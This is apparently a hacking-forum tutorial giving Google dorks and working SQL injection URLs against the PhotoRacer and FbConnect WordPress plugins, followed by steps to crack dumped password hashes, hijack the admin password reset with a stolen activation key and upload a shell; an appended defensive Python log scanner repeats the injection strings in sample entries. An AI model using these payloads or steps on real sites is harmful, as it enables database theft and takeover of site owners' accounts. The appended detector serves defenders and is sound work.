
WordPress Exploit Tutorial


dEEpEst


[HIDE-THANKS]###

# Title : PhotoRacer & FbConnect SQL Injection Vulnerability

# Type : SQL Injection Exploit

# Security Risk : High

###

 

###

# Google Dork 1 :

# inurl:"wp-content/plugins/photoracer/viewimg.php?id=1

# Google Dork 2 :

# inurl:"?fbconnect_action=myhome&userid=1

###

 

###

# Exploit 1 :

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users--

# Exploit 2 :

/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_*login,0x3a,user_pass )***8203;***8203;,7,8,9,10,11,12+from+wp_users--

###

 

[~] Choose your target, try to inject by using tools (Havij, Sql Poizon, etc.) or manually ...

[~] Once you find Data : User, E-mail, Password or Activation Key, you need to crack the MD5(Wordpress) Hash

Example : $P$B4/7SILDqcoRQNvJiEgsAJW9midgZO0 = Administrator

[~] If you can't crack the Hash try another way " Reset Admin Password "

Example : http://www.yourtarget.com/wp-login.php?a...stpassword

[~] And paste the administrator E-mail and click "Get New Password"

[~] Now inject again because you need to take the activation key, that will be like this

Example : user_activation_key=1k34jcusHodi56edwkxA

[~] Now reset the Admin password using activation key

Example : http://www.yourtarget.com/wp-login.php?a...ogin=admin

[~] Set the new password, log in, upload shell or whatever you want, that's all ... Enjoy Hacking !

 

[/HIDE-THANKS]
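For defenders, both requests in the post put SQL text into a parameter that should only ever hold an integer, which is easy to spot in web server logs. The following is an added example, not part of the original post: it assumes combined-format access logs, the rule names and sample log lines are constructed, and both `userid` and `fbuserid` are checked because the post uses both spellings.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Each rule: a label, a test that recognises the endpoint, and the
# parameters that must be plain integers on that endpoint.
RULES = [
    ("photoracer-viewimg",
     lambda path, q: path.endswith("/wp-content/plugins/photoracer/viewimg.php"),
     ("id",)),
    ("fbconnect-myhome",
     lambda path, q: "myhome" in q.get("fbconnect_action", []),
     ("userid", "fbuserid")),
]
# Client address and request target from a combined-format log entry.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")

def check_line(line):
    """Return (client, rule, param, decoded_value) for a suspicious entry, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)  # decodes %xx and '+'
    for name, matches, params in RULES:
        if not matches(url.path, query):
            continue
        for param in params:
            for value in query.get(param, []):
                if not INTEGER_RE.fullmatch(value):
                    return client, name, param, value
    return None

def scan(lines):
    return [hit for hit in map(check_line, lines) if hit]

# Constructed sample entries (documentation address ranges, shortened values).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3 HTTP/1.1" 200 812',
    '203.0.113.9 - - [10/Oct/2023:13:56:09 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2 HTTP/1.1" 200 900',
    '198.51.100.4 - - [10/Oct/2023:13:57:20 +0000] "GET /?fbconnect_action=myhome&fbuserid=44 HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on either rule followed by a password-reset request for an administrator account from the same client matches the sequence the post describes and warrants rotating credentials and reviewing `wp_users` for changed activation keys.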
